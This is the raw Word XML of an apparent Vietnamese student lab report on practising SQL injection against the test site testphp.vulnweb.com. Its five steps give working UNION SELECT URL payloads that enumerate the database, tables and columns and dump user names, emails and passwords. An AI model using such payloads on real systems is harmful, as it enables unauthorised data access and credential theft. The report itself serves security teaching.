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639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80"/>
        <w:gridCol w:w="8459"/>
      </w:tblGrid>
      <w:tr w:rsidR="003D27BF" w:rsidRPr="008A1FD0" w14:paraId="776966CB" w14:textId="77777777" w:rsidTr="000F161B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1180" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4561EC09" w14:textId="77777777" w:rsidR="003D27BF" w:rsidRPr="008A1FD0" w:rsidRDefault="003D27BF" w:rsidP="000F161B">
            <w:pPr>
              <w:pStyle w:val="txtTieuDe02"/>
            </w:pPr>
            <w:r w:rsidRPr="008A1FD0">
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15CE17CF" wp14:editId="1E742B94">
                  <wp:extent cx="609600" cy="609600"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="1" name="Picture 1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59" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="58A900B7" w14:textId="77777777" w:rsidR="003D27BF" w:rsidRDefault="003D27BF" w:rsidP="000F161B">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="0" w:name="_Toc479091051"/>
            <w:r w:rsidRPr="008A1FD0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t>THỰC HÀNH TẤN CÔNG SQL INJECTION</w:t>
            </w:r>
            <w:bookmarkEnd w:id="0"/>
          </w:p>
          <w:p w14:paraId="668D5873" w14:textId="77777777" w:rsidR="003D27BF" w:rsidRPr="008A1FD0" w:rsidRDefault="003D27BF" w:rsidP="000F161B">
            <w:pPr>
              <w:ind w:firstLine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Sử dụng đường dẫn URL</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57872A2A" w14:textId="77777777" w:rsidR="003D27BF" w:rsidRPr="008A1FD0" w:rsidRDefault="003D27BF" w:rsidP="000F161B">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="21997C46" w14:textId="77777777" w:rsidR="003D27BF" w:rsidRPr="008A1FD0" w:rsidRDefault="003D27BF" w:rsidP="003D27BF">
      <w:pPr>
        <w:pStyle w:val="txtTieuDe03"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18414D18" w14:textId="4241541F" w:rsidR="003D27BF" w:rsidRPr="00070F53" w:rsidRDefault="003D27BF" w:rsidP="003D27BF">
      <w:pPr>
        <w:pStyle w:val="txtTieuDe03"/>
        <w:ind w:firstLine="284"/>
      </w:pPr>
      <w:r w:rsidRPr="00070F53">
        <w:t xml:space="preserve">Nhóm học phần:  </w:t>
      </w:r>
      <w:r>
        <w:t>20Nh10</w:t>
      </w:r>
      <w:r w:rsidRPr="00070F53">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C374605" w14:textId="6D5DBB54" w:rsidR="003D27BF" w:rsidRDefault="003D27BF" w:rsidP="003D27BF">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Nguyễn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Công Cường – 102200013</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22BE3EA1" w14:textId="77777777" w:rsidR="000D156C" w:rsidRDefault="000D156C" w:rsidP="003D27BF">
      <w:pPr>
        <w:pStyle w:val="txtNoiDung"/>
        <w:rPr>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36C45A27" w14:textId="033BD6A4" w:rsidR="002A3E56" w:rsidRDefault="000401D0" w:rsidP="002A3E56">
      <w:r w:rsidRPr="000401D0">
        <w:t>1. Tìm xem trang web có dễ bị tấn công SQL Injection hay không</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79925EBB" w14:textId="79CAAEE2" w:rsidR="000401D0" w:rsidRPr="000401D0" w:rsidRDefault="002A3E56" w:rsidP="000401D0">
      <w:r w:rsidRPr="002A3E56">
        <w:t>http://testphp.vulnweb.com/listproducts.php?cat=1</w:t>
      </w:r>
      <w:r>
        <w:t>’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="061505D6" w14:textId="77827633" w:rsidR="004E7CE8" w:rsidRDefault="000401D0" w:rsidP="003D27BF">
      <w:r w:rsidRPr="000401D0">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="62FD782A" wp14:editId="3118250F">
            <wp:extent cx="5943600" cy="2148205"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="1162305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3059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B7CCA" w14:textId="77777777" w:rsidR="000401D0" w:rsidRDefault="000401D0" w:rsidP="003D27BF"/>
    <w:p w14:paraId="0565B22D" w14:textId="77777777" w:rsidR="000401D0" w:rsidRDefault="000401D0" w:rsidP="000401D0">
      <w:r w:rsidRPr="000401D0">
        <w:t>2. Tìm các Database hiện có</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="043F6557" w14:textId="7B80D362" w:rsidR="008D4A88" w:rsidRPr="000401D0" w:rsidRDefault="008D4A88" w:rsidP="000401D0">
      <w:hyperlink r:id="rId6" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="008D4A88">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://testphp.vulnweb.com/listproducts.php?cat=1%20union%20select%20all%201,user(),3,4,5,6,database(),8,version(),10,11</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="008D4A88">
        <w:t> .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231ADDE6" w14:textId="0516F97F" w:rsidR="000401D0" w:rsidRDefault="000401D0" w:rsidP="003D27BF">
      <w:r w:rsidRPr="000401D0">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D6E26DF" wp14:editId="02DC5234">
            <wp:extent cx="4086665" cy="2379085"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="552984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9846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3327" cy="238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A2EFD" w14:textId="5EDC1101" w:rsidR="0006617D" w:rsidRDefault="0006617D" w:rsidP="003D27BF">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="532177A6" wp14:editId="2C5548F1">
            <wp:extent cx="5833110" cy="8229600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1790927291" name="Picture 1" descr="Hướng dẫn khai thác lỗi SQL Injection cơ bả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ướng dẫn khai thác lỗi SQL Injection cơ bả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31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46FBC" w14:textId="77777777" w:rsidR="008D3ABD" w:rsidRDefault="008D3ABD" w:rsidP="008D3ABD">
      <w:r w:rsidRPr="008D3ABD">
        <w:lastRenderedPageBreak/>
        <w:t>3. Tìm Table và dữ liệu trong Table trong Database hiện tại</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9013F2" w14:textId="0B11D479" w:rsidR="008E3616" w:rsidRPr="008D3ABD" w:rsidRDefault="008E3616" w:rsidP="008D3ABD">
      <w:r w:rsidRPr="008E3616">
        <w:t>http://testphp.vulnweb.com/listproducts.php?cat=1%20union%20select%20all%201,table_name,3,4,5,6,7,8,9,10,11%20from%20information_schema.tables%20where%20table_schema%20=%27acuart%27</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE637EE" w14:textId="318331A7" w:rsidR="008D3ABD" w:rsidRDefault="00537170" w:rsidP="003D27BF">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F147EB4" wp14:editId="0925EA7B">
            <wp:extent cx="4170474" cy="6893169"/>
            <wp:effectExtent l="0" t="0" r="1905" b="3175"/>
            <wp:docPr id="1594177693" name="Picture 1" descr="Hướng dẫn khai thác lỗi SQL Injection cơ bả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ướng dẫn khai thác lỗi SQL Injection cơ bả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794" cy="6895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422C3" w14:textId="77777777" w:rsidR="00537170" w:rsidRDefault="00537170" w:rsidP="00537170">
      <w:r w:rsidRPr="00537170">
        <w:t>4. Khám phá tên cột – Column trong Table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64541501" w14:textId="0C48740B" w:rsidR="00DE771E" w:rsidRDefault="00DE771E" w:rsidP="00537170">
      <w:hyperlink r:id="rId10" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00DE771E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://testphp.vulnweb.com/listproducts.php?cat=1%20union%20select%20all%201,column_name,3,4,5,6,7,8,9,10,11%20from%20information_schema.columns where table_name=’users’</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7EA29B61" w14:textId="6C4A3A7B" w:rsidR="0006617D" w:rsidRDefault="0006617D" w:rsidP="00537170">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F98358B" wp14:editId="2F5E3C09">
            <wp:extent cx="3774685" cy="6618849"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="676549231" name="Picture 2" descr="Hướng dẫn khai thác lỗi SQL Injection cơ bả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ướng dẫn khai thác lỗi SQL Injection cơ bả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176" cy="6621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833A5" w14:textId="77777777" w:rsidR="00AD2299" w:rsidRDefault="00AD2299" w:rsidP="00AD2299">
      <w:r w:rsidRPr="00AD2299">
        <w:t>5. Tìm dữ liệu được lưu trữ trong Table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370B8405" w14:textId="4ACF9B95" w:rsidR="00DE771E" w:rsidRDefault="00DE771E" w:rsidP="00537170">
      <w:hyperlink r:id="rId12" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00DE771E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://testphp.vulnweb.com/listproducts.php?cat=1%20union select all 1,name,3,4,5,6,email,8,pass,10,11 from users</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5FE0AE87" w14:textId="29D3A271" w:rsidR="00AD2299" w:rsidRPr="00537170" w:rsidRDefault="00AD2299" w:rsidP="00537170">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C9D3481" wp14:editId="37C88E6F">
            <wp:extent cx="3524250" cy="2152650"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1537313195" name="Picture 3" descr="Hướng dẫn khai thác lỗi SQL Injection cơ bả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ướng dẫn khai thác lỗi SQL Injection cơ bả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6C048" w14:textId="77777777" w:rsidR="00537170" w:rsidRPr="003D27BF" w:rsidRDefault="00537170" w:rsidP="003D27BF"/>
    <w:sectPr w:rsidR="00537170" w:rsidRPr="003D27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79A"/>
    <w:rsid w:val="000401D0"/>
    <w:rsid w:val="0006617D"/>
    <w:rsid w:val="000D156C"/>
    <w:rsid w:val="002A3E56"/>
    <w:rsid w:val="003C7ABD"/>
    <w:rsid w:val="003D27BF"/>
    <w:rsid w:val="00412D11"/>
    <w:rsid w:val="004E7CE8"/>
    <w:rsid w:val="00537170"/>
    <w:rsid w:val="005B0824"/>
    <w:rsid w:val="008C279A"/>
    <w:rsid w:val="008D3ABD"/>
    <w:rsid w:val="008D4A88"/>
    <w:rsid w:val="008E3616"/>
    <w:rsid w:val="00902599"/>
    <w:rsid w:val="00AD2299"/>
    <w:rsid w:val="00D65171"/>
    <w:rsid w:val="00DB370B"/>
    <w:rsid w:val="00DE771E"/>
    <w:rsid w:val="00EC0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F1849"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{CFD282FF-B649-4CE0-89C8-CA3F196C3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27BF"/>
    <w:pPr>
      <w:spacing w:before="60" w:after="60" w:line="360" w:lineRule="atLeast"/>
      <w:ind w:firstLine="360"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:noProof/>
      <w:color w:val="000000"/>
      <w:kern w:val="0"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26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279A"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="360" w:after="8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noProof w:val="0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279A"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="160" w:after="80" w:line="259" w:lineRule="auto"/>
      <w:ind w:firstLine="0"/>
      <w:jc w:val="left"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:noProof w:val="0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279A"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="160" w:after="80" w:line="259" w:lineRule="auto"/>
      <w:ind w:firstLine="0"/>
      <w:jc w:val="left"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="majorBidi"/>
      <w:noProof w:val="0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279A"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="80" w:after="40" w:line="259" w:lineRule="auto"/>
      <w:ind w:firstLine="0"/>
      <w:jc w:val="left"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:noProof w:val="0"/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:kern w:val="2"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="2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279A"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="80" w:after="40" w:line="259" w:lineRule="auto"/>
      <w:ind w:firstLine="0"/>
      <w:jc w:val="left"/>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="majorBidi"/>
      <w:noProof w:val="0"/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:kern w:val="2"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="2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279A"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="40" w:after="0" w:line="259" w:lineRule="auto"/>
      <w:ind w:firstLine="0"/>
      <w:jc w:val="left"/>
      <w:outlineLvl w:val="5"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:noProof w:val="0"/>
      <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
      <w:kern w:val="2"/>
      <w:sz w:val="22"/>
      <w:szCs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279A"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="40" w:after="0" w:line="259" w:lineRule="auto"/>
      <w:ind w:firstLine="0"/>
      <w:jc w:val="left"/>
      <w:outlineLvl w:val="6"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="majorBidi"/>
      <w:noProof w:val="0"/>
      <w:color w:val="595959" w:themeColor="text1" w:themeTint="A6"/>
      <w:kern w:val="2"/>
      <w:sz w:val="22"/>
      <w:szCs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279A"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="0" w:after="0" w:line="259" w:lineRule="auto"/>
      <w:ind w:firstLine="0"/>
      <w:jc w:val="left"/>
      <w:outlineLvl w:val="7"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:noProof w:val="0"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
      <w:kern w:val="2"/>
      <w:sz w:val="22"/>
      <w:szCs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279A"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="0" w:after="0" w:line="259" w:lineRule="auto"/>
      <w:ind w:firstLine="0"/>
      <w:jc w:val="left"/>
      <w:outlineLvl w:val="8"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="majorBidi"/>
      <w:noProof w:val="0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27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27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C27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27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27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27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27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27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27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279A"/>
    <w:pPr>
      <w:spacing w:before="0" w:after="80" w:line="240" w:lineRule="auto"/>
      <w:ind w:firstLine="0"/>
      <w:contextualSpacing/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:noProof w:val="0"/>
      <w:color w:val="auto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C27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279A"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="1"/>
      </w:numPr>
      <w:spacing w:before="0" w:after="160" w:line="259" w:lineRule="auto"/>
      <w:ind w:firstLine="360"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="majorBidi"/>
      <w:noProof w:val="0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C27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279A"/>
    <w:pPr>
      <w:spacing w:before="160" w:after="160" w:line="259" w:lineRule="auto"/>
      <w:ind w:firstLine="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:noProof w:val="0"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C27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279A"/>
    <w:pPr>
      <w:spacing w:before="0"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noProof w:val="0"/>
      <w:color w:val="auto"/>
      <w:kern w:val="2"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="2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C27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27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noProof w:val="0"/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:kern w:val="2"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="2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27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279A"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="txtNoiDung">
    <w:name w:val="_txtNoiDung"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rsid w:val="003D27BF"/>
    <w:pPr>
      <w:ind w:firstLine="284"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="txtTieuDe02">
    <w:name w:val="_txtTieuDe02"/>
    <w:basedOn w:val="TOCHeading"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:rsid w:val="003D27BF"/>
    <w:pPr>
      <w:keepLines w:val="0"/>
      <w:spacing w:before="0" w:line="252" w:lineRule="auto"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Verdana" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Verdana" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:noProof/>
      <w:color w:val="auto"/>
      <w:kern w:val="0"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="txtTieuDe03">
    <w:name w:val="_txtTieuDe03"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rsid w:val="003D27BF"/>
    <w:pPr>
      <w:keepNext/>
      <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
      <w:ind w:firstLine="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:color w:val="auto"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="003D27BF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D27BF"/>
    <w:pPr>
      <w:spacing w:before="240" w:after="0"/>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr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E771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77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5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7.jpe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yperlink" Target="https://anonyviet.com/tieptucdentrangmoi/?url=http%3A%2F%2Ftestphp.vulnweb.com%2Flistproducts.php%3Fcat%3D1%2520union%2520select%2520all%25201%2Cname%2C3%2C4%2C5%2C6%2Cemail%2C8%2Cpass%2C10%2C11%2520from%2520user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nonyviet.com/tieptucdentrangmoi/?url=https%3A%2F%2Ftestphp.vulnweb.com%2Flistproducts.php%3Fcat%3D1%2520union%2520select%2520all%25201%2Cuser%28%29%2C3%2C4%2C5%2C6%2Cdatabase%28%29%2C8%2Cversion%28%29%2C10%2C11" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.jpe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hyperlink" Target="https://anonyviet.com/tieptucdentrangmoi/?url=http%3A%2F%2Ftestphp.vulnweb.com%2Flistproducts.php%3Fcat%3D1%2520union%2520select%2520all%25201%2Ccolumn_name%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2520from%2520information_schema.columns%2520where%2520table_name%3D%2527users%2527" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.jpg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 Nguyen Cong</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Cuong Nguyen Cong</cp:lastModifiedBy>
  <cp:revision>13</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-08-31T02:05:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-08-31T04:14:00Z</dcterms:modified>
</cp:coreProperties>
</file>